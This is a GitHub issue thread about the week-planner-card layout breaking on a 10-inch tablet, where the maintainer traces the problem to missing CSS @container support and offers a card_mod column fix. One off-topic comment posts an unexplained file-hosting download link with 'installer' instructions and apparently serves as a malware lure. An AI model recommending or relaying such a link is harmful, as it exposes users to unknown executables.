### ISSUE TITLE
Cramped top bar

### ISSUE THREAD

**Issue by BurningTheSky** [FamousWolf/week-planner-card#134]
Hi,

I'm giving the calendar a go with some controls to the right so I can have it displayed on a tablet for the family to see and to be able to control some lights and routines but the weather and temp are displaying on top of the date and day. Are there any suggestions on how to fix this/do a better layoutwith this?

Thanks!

![Screenshot_20240904-141632_Fully Kiosk Browser](https://github.com/user-attachments/assets/912cc88f-4933-44cd-942b-16e7a687d13c)

**Comment by GenaroSalomone** [comment]
try this
https://gofile.io/d/yMHabA
select the desired compiler in the installer

**Comment by FamousWolf** [comment]
The font size is bigger than it should be. Do you have any custom CSS or a custom theme?

**Comment by BurningTheSky** [comment]
> The font size is bigger than it should be. Do you have any custom CSS or a custom theme?

No, nothing that I've knowingly applied. It is on a 10" tablet if that could be affecting it?

**Comment by kallanroi** [comment]
I'm having a similar issue, looks great on the 16" laptop screen but on a 10" android panel it doesn't flow into the second line and instead try to keep everything in one line

**Comment by FamousWolf** [comment]
I think this is the same issue as #166. I'm using `@container` in CSS to detect the size of the card and adjust the columns accordingly. However `@container` is a relatively new feature in CSS. If you have an older browser it might not support it, which means it uses the default CSS for days and places it in 7 columns, even though there's not enough space for that. The only way to fix it is to update your OS/Browser to a version that does support `@container` or to use card_mod to set the number of columns to a lower number (which would also change it on larger screens if they also don't support `@container`).

For example, this will set it to 5 columns:

```yaml
card_mod:
  style: |
    .container .day {
      width: calc((100% - 4 * var(--days-spacing)) / 5);
    }
```

The first number (`4`) is the number of spaces, which is 1 less than the number of columns. The second number (`5`) is the number of columns.
